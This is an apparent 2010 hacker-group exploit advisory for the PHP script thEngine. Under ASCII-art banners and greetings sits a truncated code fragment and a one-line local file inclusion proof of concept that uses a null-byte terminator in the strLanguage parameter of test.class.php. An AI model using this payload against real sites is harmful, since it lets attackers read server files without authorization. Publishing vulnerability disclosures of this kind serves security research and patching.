============================================================================================= ============================================================================================= == @@@@@@@@ @@@@@@ @@@@@@@ @@ @@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == == @@@@@@@@ @@@@@@ @@@@@@@ @@@ @@@ @@@@@@ @@ @@ @@@@@@@@ @@@@@@ == == @@ @@ @@ @@ @@ @ @ @@ @@ @@ @@ @@ @@ == == @@ @@ @@ @@ @@ @ @ @@ @@ @@ @@ @@ @@ == == @@ @@@@@@ @@@@@@@ @@ @ @@ @@@@@@ @@ @@ @@ @@@@@@ == == @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ == == @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ == == @@ @@@@@@ @@ @@ @@ @@ @@@@@@ @@@@@@ @@ @@ @@@@@@ == == @@ @@@@@@ @@ @@ @@ @@ @@@@@@@ @@@@@@ @@@@@@ @@ @@ @@@@@@ == == == ============================================================================================= ============================================================================================= ||| ||| ||| ||| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~ Greetz and Thanks to: All member manadocoding.net ~~~~ ~~~ ~~~~ ~~~ MC team : team_elite , devilbat , virusfree , doniskynet , ~~~~ ~~~ lumut-- , kisame ~~~~ ~~~ ~~~~ ~~~ thanks for : cr4wl3r ~~~~ ~~~ ~~~~ ~~~ Discovered: team_elite[at]Auzs.net ~~~~ ~~~ ~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ||| ||| ||| ||| ############################################################################ ## ## ## Download Script: http://sourceforge.net/projects/thengine/files/ ## ## ## ## Code [test.class.php]: ## ## ## ############################################################################ ||| ||| ||| ||| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xx assign('message', TEST); xx xx $opt -> display('test.tpl'); xx xx } xx xx } xx xx ?> xx xx xx xx PoC: [thEngine_path]/modules/test/test.class.php?strLanguage=[LFI%00] xx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx * - , * - @@ * - @@# * - :@@; * - @@@@@ ......` * - @@@@.@@@@@@@@@@@# * - @@@@@@@@@@@@@@@@@@` * - @@@@@@@@@@@@@@@@@@@@; * - #@@@@@@@@@@@@@@@@@ * - `@@,@@@@@@@@@@@@@@@@@: * - @@@+@@@@@@@ @@@@@@@;@@@` * - :@@@@@@@@@:@,; @@@@@@@ .@@ * - @@@@@@@@@@@ : @@@@@@@@ @@ * - @@@@' ` ` @@@@@@@@@: +. * - .@@ @@@@@@@@@@@ . * - , +@@@@@@@@@@@@@ * - +@@@@@@@@@@@@@@@@@@@@# * - ,@@@@@@@@@@@@@@@@@ +@@@ * - `@@@@@@@@@@@@@@@@@@@ @@@ * - @@@@@@@@@@@@@@@@@@@ @@` * - @@@@@@@@@@@@@@@@@@ @@ * - +@@@@@@@@@@; @@@# @ * - @@@@@@@@@ : * - @@@@@@@@ ,@@ * - @@@@@@@@@ @@@' * - @@@@@@@`@ @@@; * - @@@@@@@ @ @. @@@@@@@@ * - @@@@@@@@@ @@@@@@@@@@@@@# * - @@@@@@@@@@@@ @@@@@@@@@@@@@@@ * - @ @@@@@@@ ;@@@@@@@@@@@@@@@@@ * - @ @@@@@@@@@@@@@@@@@@@ ,@@@@+ * - @@@@@@@@@@@@@@@@@@@ @@@@ * - @@@ @@@@@@@@@ @@@@@@; @@@@ * - @@ @@@@@@@` @@@ . @@. * - @@ ; @@@@# :@@@@@# @@. * - @ @@@: ;@ * - ;` @@ ;@ * - @@ @ * - @ # * - : : * --------------------------------------------->>>> bugs found on may 05 2010 by team_elite.